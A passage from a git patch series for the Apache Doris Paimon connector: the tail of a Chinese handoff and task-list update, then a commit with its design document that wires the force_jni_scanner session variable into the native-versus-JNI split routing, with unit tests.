MAJOR(修或显式接受)** | ✅5.`FIX-MAPPING-FLAG-KEYS`(M-crit) · ✅6.`FIX-KERBEROS-DOAS`(M-8+M-11) · **⬜7.`FIX-FORCE-JNI-SCANNER`(M-1)** | #6 已修(M-11 full parity 取代 D7=B read 从句 [D-052];M-8 fs/jdbc only [D-053];DLF 从句证实 overstated)。#7 纯连接器、scope 无歧义、直接修。 | | **P2 严重度有争议(perf;R1=MINOR)** | 8.`FIX-COUNT-PUSHDOWN`(M-2) · 9.`FIX-NATIVE-SUBSPLIT`(M-3) | 结果正确仅性能/并行。**动手前先找用户定 scope**(accept-or-defer,defer 则登 `deviations-log`)。 | -| **P3 覆盖缺口(去查)** | 复验 `FIX-HMS-CONFRES` · DDL 写路径 parity · ANALYZE/列统计 · split-count 计账 · #4 跨连接器 follow-up([DV-028])· **#5 跨连接器 follow-up(hive+iceberg mapping-flag 键,[DV-030])** | critic 标本轮未追;查出真分歧才转 FIX。 | +| **P3 覆盖缺口(去查)** | 复验 `FIX-HMS-CONFRES` · DDL 写路径 parity · ANALYZE/列统计 · split-count 计账 · 跨连接器 follow-up([DV-028]/[DV-030]/**[DV-031]**) | critic 标本轮未追;查出真分歧才转 FIX。 | | **P4 MINOR/NIT** | 见 review §5 | 一次性 cleanup;唯一真实数据边 = partition null-sentinel(`__HIVE_DEFAULT_PARTITION__`/`\N` 字面值被当 NULL)。 | --- # 📦 仓库状态 -- **HEAD = `9dcf6d1a9e5`**(`fix: FIX-MAPPING-FLAG-KEYS`,本 session #5;checkpoint docs commit 紧随)。该 fix commit = #5 连接器码(main+test)+设计 doc+D-051+DV-030+task-list 进度(7 文件,无 regression-conf/scratch)。 -- **本 checkpoint commit 改动**:`plan-doc/HANDOFF.md`(本文件)、`plan-doc/task-list-P5-rereview2-fixes.md`(#5 commit-cell 填 hash)。 +- **HEAD = `2b1442fa57a`**(`fix: FIX-KERBEROS-DOAS`,本 session #6)。该 fix commit = 连接器(2 main+2 test)+fe-core(5 main+2 test)+设计 doc+D-052/D-053+DV-031+task-list 进度(15 文件,无 regression-conf/scratch/HANDOFF)。 +- **本 checkpoint commit 改动**:`plan-doc/HANDOFF.md`(本文件)、`plan-doc/task-list-P5-rereview2-fixes.md`(#6 commit-cell 填 hash)。 - ⚠️ **`regression-test/conf/regression-conf.groovy` 仍 modified-未 commit 且含明文 Aliyun key** —— 任何 commit 前继续 path-whitelist,**严禁 `git add -A`**。`regression-conf.groovy.bak` 同理排除。 - scratch 仍未 commit(`.audit-scratch/` `conf.cmy/` `META-INF/`)。 - 当前分支 `catalog-spi-07-paimon`(非 `master`)→ 在此 commit 修复 OK。 - **legacy `datasource/paimon/*` 仍在树内**(B8 删除未做)→ 每个 fix 都能 side-by-side diff 做 parity。 -- 迁移链:…→`667f779af04`(#3)→`2d15b1b7ed7`(#4)→`9dcf6d1a9e5`(#5 MAPPING-FLAG-KEYS, HEAD)。 +- 迁移链:…→`2d15b1b7ed7`(#4)→`9dcf6d1a9e5`(#5)→`2b1442fa57a`(#6 KERBEROS-DOAS, HEAD)。 ## ⚠️ Commit 须知(任何 `git add` 前必读) - **硬前置**:scrub `regression-test/conf/regression-conf.groovy`(明文 Aliyun key)+ 清 scratch(`.audit-scratch/` `conf.cmy/` `META-INF/` `*.bak`)。**path-whitelist `git add`,严禁 `git add -A`。** - 每个 fix 独立 commit;message = `fix: ` + 根因 + 解法 + 测试,末尾带 `Co-Authored-By: Claude Opus 4.8 (1M context) `。 -- 改 fe-core/SPI 的 fix:commit 须含连接器 + SPI + fe-core 三侧 + 测试(#6 大概率含 fe-core authenticator 接线)。 +- 改 fe-core/SPI 的 fix:commit 须含连接器 + fe-core 两侧 + 测试(#6 含 fe-core authenticator 接线 + 连接器 read-wrap)。 ## ⚙️ 操作须知(复用) -- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : **-am** -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`;验证读 surefire XML + `MVN_EXIT`([[doris-build-verify-gotchas]])。**`-am` 必带**(漏 `-am` 会因 `${revision}` 解析失败报「could not resolve fe-connector-spi」而非真错)。`-pl :fe-connector-paimon -am` **不重编 fe-core**;改 fe-core 须单独 `-pl :fe-core -am`。checkstyle 单独 `checkstyle:check`(`test` 阶段不绑)。 +- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : **-am** -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`;验证读 surefire XML + `MVN_EXIT`([[doris-build-verify-gotchas]])。**`-am` 必带**。`-pl :fe-connector-paimon -am` **不重编 fe-core**;改 fe-core 须单独 `-pl :fe-core -am`。**checkstyle 绑在 fe-core `test` build**(#6 临时 neuter 写 `if (true) { return; }` 触 LeftCurly 挂 build,须 checkstyle-clean 的 neuter)。 - 连接器禁 import fe-core:`bash tools/check-connector-imports.sh`(仅允许 `org.apache.doris.{thrift,connector,extension,filesystem}`)。 - cwd 跨 Bash 调用持久,`cd` 破相对路径 → 一律绝对路径。 -- 测试优先 runnable FE **单测**(连接器 harness:`FakePaimonTable`/`RecordingPaimonCatalogOps`/`RecordingConnectorContext`/`PaimonConnectorMetadataTest`/`PaimonScanPlanProviderTest`);live-e2e(S3/OSS/REST/JDBC/Kerberos)CI-gated → 注明 gated,勿谎称跑过。 +- 测试优先 runnable FE **单测**(连接器 harness:`RecordingConnectorContext`(`failAuth`/`authCount`)/`RecordingPaimonCatalogOps`(读 log)/`FakePaimonTable`/`PaimonConnectorMetadataReadAuthTest`/`PaimonScanPlanProviderTest`;fe-core metastore-props 用 `MetastoreProperties.create`+`StorageProperties.createAll` 离线);live-e2e(S3/OSS/REST/JDBC/**Kerberos**)CI-gated → 注明 gated,勿谎称跑过。 ## 🧠 给下一个 agent 的 meta -- **#5 验证的高价值模式(再次奏效)**:critic-surfaced/未过-3-lens 的 finding → **先 scout workflow 独立复核**(5 并行 reader 各 1 角度:git-history canonical-key intent / legacy parity / docs+regression 证据 / failure-manifestation 端到端 / 跨连接器 scope)+ **对抗 synthesizer 先 steelman false-positive 再裁决** → 设计 → 实现 → **fail-before 实测**(临时 neuter 源码值、跑两测、bug-catcher 向红 guard 两态绿)→ 4-lens review 可选。本次 scout 揪出 finding 没说的关键事实:① binary 键**双重漂移**(不只分隔符)② hive/iceberg **同根因**(决定 scope 要问用户)③ BE scan param 经 `FileQueryScanNode` 继承本就读点分(决定「无 BE」)。 -- **改 fe-core handle/scan 流前,先 grep 全 `metadata.getTableHandle` / scan-node 调用方**(历史教训:独立 handle 面绕 seam 会静默错行)。 -- **#6 两处 scope 决策先问用户**(D7 读-vs-DDL 不对称是否打破 / M-8「DLF」从句先核实);P2 两条(#8/#9)严重度有争议 → **先找用户定 scope 再动手**。 -- **跨连接器 follow-up 累积**:[DV-028](#4 CREATE-time-only 校验,全 plugin 连接器共有)+ [DV-030](#5 hive+iceberg mapping-flag 键,同 paimon 根因)—— 若将来批量 close,二者都是「新连接器读法 vs fe-core 既有约定」的同类缝。 +- **#6 验证的高价值模式(再次奏效)**:finding → **5-agent scout workflow 独立复核**(M-8 flow / M-8 legacy / M-11 read-sites / DLF+D7 / scope+test)+ **对抗 synthesizer** → 框定 2 个 scope 决策问用户(`AskUserQuestion`)→ 设计 → 实现 → **fail-before 实测**(neuter wrap、跑两测、向红)→ pass-after。本次 scout 揪出 finding 没说的关键事实:① M-8 不是「缺 wrap」而是「wrap 背后 authenticator 是 no-op」(connector 已 wrap、fe-core 才是 seam)② legacy 包**所有** read(getTable+listPartitions+…)非仅 listPartitions → 决定 M-11 scope ③ DLF 从句 overstated(DLF 无 Kerberos)④ **Kerberos `UGI.doAs` 包 checked 异常成 `UndeclaredThrowableException`** → domain 异常必须 lambda 内捕获。 +- **改 fe-core handle/scan 流前,先 grep 全 `metadata.getTableHandle` / scan-node 调用方**(历史教训)。 +- **#7 纯连接器、scope 无歧义**(明确读 session `force_jni_scanner` 路由 JNI)→ 直接修,无须问用户。**P2(#8/#9)严重度有争议 → 先找用户定 scope 再动手**。 +- **跨连接器 follow-up 累积**:[DV-028](#4 CREATE-time-only 校验)+ [DV-030](#5 mapping-flag 键)+ **[DV-031](#6 read-vs-DDL doAs + 翻闸-authenticator-wiring,hudi/iceberg 同样复发)** —— 将来批量 close 时三者同属「新连接器读法/翻闸 vs fe-core 既有约定」类缝。 diff --git a/plan-doc/task-list-P5-rereview2-fixes.md b/plan-doc/task-list-P5-rereview2-fixes.md index 3f9ef2ab2f00b7..359291562f25de 100644 --- a/plan-doc/task-list-P5-rereview2-fixes.md +++ b/plan-doc/task-list-P5-rereview2-fixes.md @@ -28,7 +28,7 @@ | 3 | FIX-SCHEMA-EVOLUTION | BLOCKER | B-1a (M-10 deferred) | connector builds `current_schema_id`/`history_schema_info` thrift dict (Design C) | no¹ | ✅ | ✅ | ✅ 222/0/0 | ✅ `667f779af04` | | 4 | FIX-JDBC-DRIVER-URL | BLOCKER | B-8a + B-8b | resolve+alias `jdbc.driver_url` for BE; enforce security allow-list | no² | ✅ | ✅ | ✅ 232/0/0 | ✅ `2d15b1b7ed7` | | 5 | FIX-MAPPING-FLAG-KEYS | MAJOR | M-crit | dotted-vs-underscore type-mapping flag keys (wrong type) | no | ✅ | ✅ | ✅ 234/0/0 | ✅ `9dcf6d1a9e5` | -| 6 | FIX-KERBEROS-DOAS | MAJOR | M-8 + M-11 | M-8: wire HDFS authenticator for fs/jdbc (fe-core); M-11: wrap ALL read RPCs in `executeAuthenticated` (connector, full legacy parity) | no³ | ✅ | ✅ | ✅ 248/0/0 + 14/0/0 | ⬜ | +| 6 | FIX-KERBEROS-DOAS | MAJOR | M-8 + M-11 | M-8: wire HDFS authenticator for fs/jdbc (fe-core); M-11: wrap ALL read RPCs in `executeAuthenticated` (connector, full legacy parity) | no³ | ✅ | ✅ | ✅ 248/0/0 + 21/0/0 | ✅ `2b1442fa57a` | | 7 | FIX-FORCE-JNI-SCANNER | MAJOR | M-1 | honor `force_jni_scanner` session var on connector scan | no | ⬜ | ⬜ | ⬜ | ⬜ | | 8 | FIX-COUNT-PUSHDOWN | MAJOR* | M-2 | FE-computed `mergedRowCount` / `paimon.row_count` (perf) | maybe | ⬜ | ⬜ | ⬜ | ⬜ | | 9 | FIX-NATIVE-SUBSPLIT | MAJOR* | M-3 | native ORC/Parquet sub-file splitting (parallelism) | maybe | ⬜ | ⬜ | ⬜ | ⬜ | From c2bbb8549c534d704fdb6e96e9225e12a80b0657 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 12 Jun 2026 08:50:09 +0800 Subject: [PATCH 026/128] =?UTF-8?q?fix:=20FIX-FORCE-JNI-SCANNER=20?= =?UTF-8?q?=E2=80=94=20honor=20force=5Fjni=5Fscanner=20session=20var=20on?= =?UTF-8?q?=20paimon=20connector=20scan=20path=20(M-1)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: the cutover (plugin) connector's split router read only the name-derived handle flag paimonHandle.isForceJni() (the binlog/audit_log NAME hatch) and never consulted the session var force_jni_scanner, so ORC/Parquet always took the native reader — legacy's JNI escape hatch (SET force_jni_scanner=true, used to dodge native-reader bugs incl. the B2 schema-evolution class) was silently gone. The connector ported only two of legacy's three native-gate conjuncts (PaimonScanNode.java:430: !forceJniScanner && !forceJniForSystemTable && supportNativeReader); the dropped !forceJniScanner conjunct is M-1. Solution (pure connector; no SPI, no fe-core import, no BE param — legacy serializes nothing for this var): - new isForceJniScannerEnabled(session): byte-for-byte mirror of isCppReaderEnabled, reads key "force_jni_scanner" (byte-identical to SessionVariable.FORCE_JNI_SCANNER) from the same VariableMgr.toMap channel; null-guarded, default false (legacy default). - Site A (correctness): shouldUseNativeReader gains an explicit forceJniScanner param (mirrors legacy's sibling boolean 1:1) ANDed into the native gate; planScan passes isForceJniScannerEnabled(session). The handle name-force is OR-sibling, never replaced (binlog/audit_log intact). - Site B (correctness-neutral): getScanNodeProperties suppresses the native-only paimon.schema_evolution dict when force_jni_scanner routes every split to JNI (BE consumes it only on native ORC/Parquet ranges; JNI/cpp readers ignore it). Matches the connector's own documented contract. Tests (fail-before + pass-after both verified): - isForceJniScannerEnabledReadsSessionProperty: pins the exact key, default-false, null-safety. - forceJniScannerRoutesNativeEligibleSplitToJni: a native-eligible split must route to JNI when force_jni_scanner=true (legacy parity). - 3 existing shouldUseNativeReader calls updated for the new param. - Module 250/0/0 (+1 CI-gated live skip); connector import-gate + checkstyle clean. - Real BE reader selection is a CI-gated live-e2e check (no offline coverage). Co-Authored-By: Claude Opus 4.8 (1M context) --- .../paimon/PaimonScanPlanProvider.java | 57 +++++++-- .../paimon/PaimonScanPlanProviderTest.java | 43 ++++++- .../P5-fix-FORCE-JNI-SCANNER-design.md | 116 ++++++++++++++++++ 3 files changed, 201 insertions(+), 15 deletions(-) create mode 100644 plan-doc/tasks/designs/P5-fix-FORCE-JNI-SCANNER-design.md diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index dc4731937e3f87..ca67e39b76a1f8 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -133,6 +133,13 @@ public class PaimonScanPlanProvider implements ConnectorScanPlanProvider { // (paimon::Split::Deserialize), so FE must serialize a DataSplit with that format, not Java serde. private static final String ENABLE_PAIMON_CPP_READER = "enable_paimon_cpp_reader"; + // Session variable name (byte-identical to SessionVariable.FORCE_JNI_SCANNER) surfaced through + // ConnectorSession.getSessionProperties() (VariableMgr.toMap), exactly like ENABLE_PAIMON_CPP_READER + // above. When true it is the user/session JNI escape hatch: every native-eligible DataSplit is routed + // to the JNI reader (legacy PaimonScanNode.getSplits gate, sessionVariable.isForceJniScanner()), + // bypassing the native ORC/Parquet readers to dodge native-reader bugs. Default false (legacy default). + private static final String FORCE_JNI_SCANNER = "force_jni_scanner"; + // FIX-SCHEMA-EVOLUTION (B-1a): scan-level prop carrying the base64 TBinaryProtocol-serialized // schema dictionary (a throwaway TFileScanRangeParams holding current_schema_id + // history_schema_info). getScanNodeProperties builds it from the live table; populateScanLevelParams @@ -170,6 +177,21 @@ static boolean isCppReaderEnabled(ConnectorSession session) { return Boolean.parseBoolean(session.getSessionProperties().get(ENABLE_PAIMON_CPP_READER)); } + /** + * Reads the {@code force_jni_scanner} session flag from the SPI session properties (same + * {@code VariableMgr.toMap} channel as {@link #isCppReaderEnabled}). When true the JNI escape + * hatch is engaged: every native-eligible DataSplit is routed to JNI (see + * {@link #shouldUseNativeReader}), bypassing the native ORC/Parquet readers to dodge native-reader + * bugs. Default false (legacy default), so normal reads are unaffected. Package-private static for + * offline unit testing. + */ + static boolean isForceJniScannerEnabled(ConnectorSession session) { + if (session == null) { + return false; + } + return Boolean.parseBoolean(session.getSessionProperties().get(FORCE_JNI_SCANNER)); + } + /** * Returns the handle's transient Paimon {@link Table}, reloading it from the catalog seam * when the transient reference is null (e.g. after a serialization round-trip across the @@ -292,7 +314,8 @@ public List planScan( Optional> optRawFiles = dataSplit.convertToRawFiles(); Optional> optDeletionFiles = dataSplit.deletionFiles(); - if (shouldUseNativeReader(paimonHandle.isForceJni(), optRawFiles)) { + if (shouldUseNativeReader(paimonHandle.isForceJni(), + isForceJniScannerEnabled(session), optRawFiles)) { // Native reader path List rawFiles = optRawFiles.get(); for (int i = 0; i < rawFiles.size(); i++) { @@ -432,8 +455,10 @@ public Map getScanNodeProperties( // FIX-SCHEMA-EVOLUTION (B-1a): emit the native-reader schema dictionary so BE matches file<->table // columns BY FIELD ID across schema evolution (rename/reorder) instead of falling back to NAME // matching (which silently reads NULL/garbage for renamed columns). Only meaningful when the table - // can take the native path (a DataTable read without force_jni_scanner); JNI splits never consult it. - if (!paimonHandle.isForceJni()) { + // can take the native path: skip it when the handle name-forces JNI (binlog/audit_log) OR the + // session forces JNI (force_jni_scanner) — in both cases every split goes JNI and never consults + // the dict (FIX-FORCE-JNI-SCANNER: honor the same session escape hatch the native router uses). + if (!paimonHandle.isForceJni() && !isForceJniScannerEnabled(session)) { buildSchemaEvolutionParam(table).ifPresent(v -> props.put(SCHEMA_EVOLUTION_PROP, v)); } @@ -492,22 +517,30 @@ private long computeSplitWeight(DataSplit dataSplit) { /** * Decides whether a {@link DataSplit} may take the native (ORC/Parquet) reader path. * - *

      The split is native-eligible iff (a) it is NOT name-forced to JNI by the handle, AND (b) its - * raw files all support the native reader (see {@link #supportNativeReader}). Gating on - * {@code forceJni} is the T19 fix: {@code binlog} / {@code audit_log} system tables are paimon - * {@code DataTable}s whose {@code DataSplit.convertToRawFiles()} may succeed, but the native + *

      The split is native-eligible iff (a) it is NOT name-forced to JNI by the handle, AND (b) it is + * NOT session-forced to JNI via {@code force_jni_scanner}, AND (c) its raw files all support the + * native reader (see {@link #supportNativeReader}). Mirrors legacy's three-boolean gate + * {@code !forceJniScanner && !forceJniForSystemTable && supportNativeReader} (PaimonScanNode.getSplits). + * + *

      {@code forceJni} is the T19 name-force: {@code binlog} / {@code audit_log} system tables are + * paimon {@code DataTable}s whose {@code DataSplit.convertToRawFiles()} may succeed, but the native * reader cannot reproduce their read semantics (binlog pack/merge + array materialization; * audit_log rowkind/sequence-number projection), so they would silently return wrong rows. Legacy * forces them to JNI ({@code PaimonScanNode.shouldForceJniForSystemTable}, captured by - * {@link PaimonTableHandle#isForceJni()}). ONLY the {@code forceJni} flag gates this: metadata sys - * tables already go JNI via the non-DataSplit path, and a non-forced {@code DataTable} like "ro" - * (forceJni=false) must still be allowed native — so this must not over-force. + * {@link PaimonTableHandle#isForceJni()}). It must NOT over-force: metadata sys tables already go + * JNI via the non-DataSplit path, and a non-forced {@code DataTable} like "ro" (forceJni=false) + * must still be allowed native. + * + *

      {@code forceJniScanner} is the user/session escape hatch ({@code SET force_jni_scanner=true}, + * read via {@link #isForceJniScannerEnabled}): when set, every native-eligible split is routed to + * JNI to dodge native-reader bugs. Default false, so normal reads are unaffected. * *

      Extracted as a pure static so the correctness-critical routing decision is unit-testable * with real {@link RawFile}s, without driving a full Paimon {@code ReadBuilder}/{@code TableScan}. */ - static boolean shouldUseNativeReader(boolean forceJni, Optional> optRawFiles) { - return !forceJni && supportNativeReader(optRawFiles); + static boolean shouldUseNativeReader(boolean forceJni, boolean forceJniScanner, + Optional> optRawFiles) { + return !forceJni && !forceJniScanner && supportNativeReader(optRawFiles); } private static boolean supportNativeReader(Optional> optRawFiles) { diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java index 50182165bf0d61..5668f45fb955f1 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java @@ -203,7 +203,8 @@ public void forceJniSysTableSplitDoesNotTakeNativePathEvenWithRawFiles() { // wrong rows. MUTATION: dropping the `!forceJni` guard in shouldUseNativeReader -> // returns true here (native) -> red. Assertions.assertFalse( - PaimonScanPlanProvider.shouldUseNativeReader(/*forceJni*/ true, rawFiles), + PaimonScanPlanProvider.shouldUseNativeReader( + /*forceJni*/ true, /*forceJniScanner*/ false, rawFiles), "a forceJni (binlog/audit_log) sys split must route to JNI, never native, " + "even when its raw files would otherwise support the native reader"); } @@ -219,7 +220,8 @@ public void nonForcedSplitWithRawFilesStillTakesNativePath() { // would regress the native fast path for normal tables and "ro". MUTATION: gating native on // anything stricter (e.g. isSystemTable) -> returns false here -> red. Assertions.assertTrue( - PaimonScanPlanProvider.shouldUseNativeReader(/*forceJni*/ false, rawFiles), + PaimonScanPlanProvider.shouldUseNativeReader( + /*forceJni*/ false, /*forceJniScanner*/ false, rawFiles), "a non-forced split with native-eligible raw files must still take the native path"); } @@ -228,10 +230,29 @@ public void nonForcedSplitWithoutNativeFilesTakesJni() { // Sanity: even when not forced, a split whose raw files are absent must not go native. // MUTATION: making shouldUseNativeReader ignore supportNativeReader -> returns true -> red. Assertions.assertFalse( - PaimonScanPlanProvider.shouldUseNativeReader(/*forceJni*/ false, Optional.empty()), + PaimonScanPlanProvider.shouldUseNativeReader( + /*forceJni*/ false, /*forceJniScanner*/ false, Optional.empty()), "a split without convertible raw files must route to JNI regardless of forceJni"); } + @Test + public void forceJniScannerRoutesNativeEligibleSplitToJni() { + // FIX-FORCE-JNI-SCANNER (M-1): a normal (non-name-forced) split whose raw files DO support the + // native reader must STILL route to JNI when the session sets force_jni_scanner=true — this is the + // user escape hatch legacy honors (PaimonScanNode.getSplits gate: !forceJniScanner && ...). Without + // it the native-reader bug the user is trying to dodge stays on the native path. + Optional> rawFiles = Optional.of( + Arrays.asList(parquetRawFile("/data/part-0.parquet"))); + + // WHY: routing-correctness — force_jni_scanner is a sibling of the handle name-force, ANDed into + // the same native gate. MUTATION: dropping the `!forceJniScanner` conjunct in shouldUseNativeReader + // -> this native-eligible split goes native despite force_jni_scanner=true -> red. + Assertions.assertFalse( + PaimonScanPlanProvider.shouldUseNativeReader( + /*forceJni*/ false, /*forceJniScanner*/ true, rawFiles), + "force_jni_scanner=true must route even native-eligible ORC/Parquet splits to JNI"); + } + // ---- FIX-URI-NORMALIZE (B-7DF data file + B-7DV deletion vector) ---- @Test @@ -540,6 +561,22 @@ public void isCppReaderEnabledReadsSessionProperty() { "a null session must default to false"); } + @Test + public void isForceJniScannerEnabledReadsSessionProperty() { + // FIX-FORCE-JNI-SCANNER (M-1): pins the EXACT session key ("force_jni_scanner", byte-identical to + // SessionVariable.FORCE_JNI_SCANNER) and the default-false semantics. Both native sites (the split + // router and the schema-evolution emit gate) hinge on reading this flag correctly. MUTATION: wrong + // key, or defaulting true -> red. + Assertions.assertTrue(PaimonScanPlanProvider.isForceJniScannerEnabled( + sessionWithProps(Collections.singletonMap("force_jni_scanner", "true")))); + Assertions.assertFalse(PaimonScanPlanProvider.isForceJniScannerEnabled( + sessionWithProps(Collections.singletonMap("force_jni_scanner", "false")))); + Assertions.assertFalse(PaimonScanPlanProvider.isForceJniScannerEnabled( + sessionWithProps(Collections.emptyMap())), "absent flag must default to false"); + Assertions.assertFalse(PaimonScanPlanProvider.isForceJniScannerEnabled(null), + "a null session must default to false"); + } + // --------------------------------------------------------------------- // FIX-REST-VENDED — per-table vended credentials overlaid as location.* // --------------------------------------------------------------------- diff --git a/plan-doc/tasks/designs/P5-fix-FORCE-JNI-SCANNER-design.md b/plan-doc/tasks/designs/P5-fix-FORCE-JNI-SCANNER-design.md new file mode 100644 index 00000000000000..77c0d05ae3de10 --- /dev/null +++ b/plan-doc/tasks/designs/P5-fix-FORCE-JNI-SCANNER-design.md @@ -0,0 +1,116 @@ +# P5 fix design — `FIX-FORCE-JNI-SCANNER` (rereview2 #7 = M-1) + +> Source finding: `plan-doc/reviews/P5-paimon-rereview2-2026-06-11.md` (M-1; 3/3 confirmed, C+P+R upheld). +> Re-verified against **current** code (4-scout + adversarial-synthesizer workflow `wf_0e3e0976-b53` + independent reads). +> Scope: **MAJOR, pure connector, no SPI, no BE param** — unambiguous (per HANDOFF, no user decision needed). + +--- + +## Problem + +Legacy honors the session var `force_jni_scanner`: `SET force_jni_scanner=true` routes **all** data splits to the JNI reader, bypassing the native ORC/Parquet readers. This is the **escape hatch** used to dodge native-reader bugs (e.g. the B2 schema-evolution class of bug). + +The cutover (plugin) connector **never reads `force_jni_scanner`**. Its split router consults only `paimonHandle.isForceJni()` — the **name-derived** binlog/audit_log flag (`PaimonConnectorMetadata.java:335`, computed from the system-table name, zero session input). So on the connector path, ORC/Parquet **always** take the native reader and the escape hatch is silently gone. + +Repro: `SET force_jni_scanner=true; SELECT * FROM paimon_orc_table` → connector still uses the native reader. + +## Root Cause + +The native-vs-JNI routing gate ports only **two** of legacy's **three** conjuncts. + +Legacy gate (`PaimonScanNode.java:430`): +```java +} else if (!forceJniScanner && !forceJniForSystemTable && supportNativeReader(optRawFiles)) { +``` +- `forceJniScanner` = `sessionVariable.isForceJniScanner()` (`:361`) — the **session** escape hatch. +- `forceJniForSystemTable` = `shouldForceJniForSystemTable()` (`:367`) — binlog/audit NAME force. +- `supportNativeReader(optRawFiles)` — all raw files are `.orc`/`.parquet`. + +Connector pure static (`PaimonScanPlanProvider.java:509-511`): +```java +static boolean shouldUseNativeReader(boolean forceJni, Optional> optRawFiles) { + return !forceJni && supportNativeReader(optRawFiles); // forceJni == forceJniForSystemTable only +} +``` +The first conjunct (`!forceJniScanner`) is **dropped**. This dropped conjunct **is** M-1. + +The session var is fully reachable with **no fe-core import**: `SessionVariable.FORCE_JNI_SCANNER = "force_jni_scanner"` is a `@VarAttr` (`SessionVariable.java:772,2879`) with no `INVISIBLE` flag and not `REMOVED`, so `VariableMgr.toMap` emits it into `ConnectorSession.getSessionProperties()` — the **exact same channel** the connector already reads for its sibling `enable_paimon_cpp_reader` (`isCppReaderEnabled`, `PaimonScanPlanProvider.java:166-171`). The literal string `"force_jni_scanner"` is the contract. + +## Design + +Pure connector, one file (`PaimonScanPlanProvider.java`) + its test. No SPI signature change, no fe-core import, no BE serialization (legacy serializes nothing for this var — grep confirms only fe-core lines 361/367/430 reference it). + +### 1. Read the session var (mirror `isCppReaderEnabled`) +- New constant `FORCE_JNI_SCANNER = "force_jni_scanner"` (byte-identical to `SessionVariable.FORCE_JNI_SCANNER`). +- New package-private static `isForceJniScannerEnabled(ConnectorSession session)`: null-guard → `false`; else `Boolean.parseBoolean(session.getSessionProperties().get(FORCE_JNI_SCANNER))`. Byte-for-byte mirror of `isCppReaderEnabled` (default false = legacy default, so normal reads unaffected). + +### 2. Site A (CORRECTNESS) — native router, `shouldUseNativeReader` +Add `forceJniScanner` as an **explicit third parameter**, mirroring legacy's three-boolean gate 1:1: +```java +static boolean shouldUseNativeReader(boolean forceJni, boolean forceJniScanner, + Optional> optRawFiles) { + return !forceJni && !forceJniScanner && supportNativeReader(optRawFiles); +} +``` +Call site (`:295`): +```java +if (shouldUseNativeReader(paimonHandle.isForceJni(), isForceJniScannerEnabled(session), optRawFiles)) { +``` + +**Why a 3rd param, not a call-site OR** (deliberate override of the workflow synthesizer's "call-site OR" suggestion; sides with the legacy-parity scout): +- `force_jni_scanner` is a **routing** input semantically identical to the existing `forceJni` param (`forceJniForSystemTable`); legacy treats them as **sibling booleans in the same gate** (`:430`). The faithful shape is a sibling param, not a hidden OR. (The `cppReader = isCppReaderEnabled(session)` precedent one line above is a *serialization-format* flag, a different role — not the right analogy.) +- **Rule 9 (tests verify intent):** the routing decision is offline-undrivable (`FakePaimonTable.newReadBuilder()` throws), so the pure static is the **only** unit-testable seam for routing. A call-site OR would leave the new dimension testable only via the helper's *string-parsing* test, which **cannot fail when the routing logic changes** — exactly the anti-pattern Rule 9 forbids. The 3rd param makes `shouldUseNativeReader(false, /*forceJniScanner*/ true, native-eligible) == JNI` a mutation-tested fact. +- Cost: 3 existing test call sites add a `false` arg (mechanical; also makes them explicit). `forceJni` is **OR-sibling, never replaced** — replacing it would re-break binlog/audit_log routing. + +### 3. Site B (cleanliness, correctness-NEUTRAL) — schema-evolution emit gate +`getScanNodeProperties:436`: +```java +if (!paimonHandle.isForceJni() && !isForceJniScannerEnabled(session)) { + buildSchemaEvolutionParam(table).ifPresent(v -> props.put(SCHEMA_EVOLUTION_PROP, v)); +} +``` +`paimon.schema_evolution` is the **native-reader-only** field-id dictionary. BE consumes it **only** on the native ORC/Parquet path (`PaimonOrcReader`/`PaimonParquetReader::on_before_init_reader` → `TableSchemaChangeHelper::gen_table_info_node_by_field_id`, `be/.../paimon_reader.cpp:51-54,188-191`); the JNI reader (`paimon_jni_reader.cpp`) and cpp reader (`paimon_cpp_reader.cpp`) **never** reference it, and BE dispatch (`file_scanner.cpp:1045-1058`) only rewrites a range to native when `!paimon_split.__isset`. When `force_jni_scanner=true`, Site A routes **every** DataSplit to JNI (non-DataSplits were already JNI) → **zero** native ranges → the dict is dead weight. + +- KEEPING the emit is harmless (JNI ignores it; costs only the base64 serialize/transport). SKIPPING it is safe (nobody consumes it). +- **Why gate it anyway:** same root cause (var never consulted) + the connector's **own comment** (`:434-435`) already documents the dict as "Only meaningful when the table can take the native path (a DataTable read *without force_jni_scanner*); JNI splits never consult it." Leaving the gate blind to the session var contradicts that documented contract. The comment is updated to state the gate now honors `force_jni_scanner`. +- Both sites read the **identical** helper, so they cannot disagree (each SPI call gets a fresh provider — no shared instance state). + +### Out of scope (verified separate findings — do NOT touch) +- **M-2 count pushdown** — connector has no count branch (legacy runs it *before* the native gate, `:421`). Separate. +- **M-3 native sub-split sizing** — connector emits one range per RawFile vs legacy `fileSplitter.splitFile` (`:445-453`). Separate. +- **`IgnoreSplitType`** (`IGNORE_JNI`/`IGNORE_NATIVE`, legacy `:389/431/471`) — a different unimplemented session gate, **not** keyed on `force_jni_scanner`. Separate. +- Non-DataSplit handling (`:281-285`) already unconditional JNI; unchanged. +- No BE param for `force_jni_scanner` (legacy adds none). + +## Implementation Plan +1. `PaimonScanPlanProvider.java`: + - add `FORCE_JNI_SCANNER` constant after `ENABLE_PAIMON_CPP_READER` (`~:134`); + - add `isForceJniScannerEnabled(ConnectorSession)` after `isCppReaderEnabled` (`~:172`); + - `:295` pass `isForceJniScannerEnabled(session)` as the 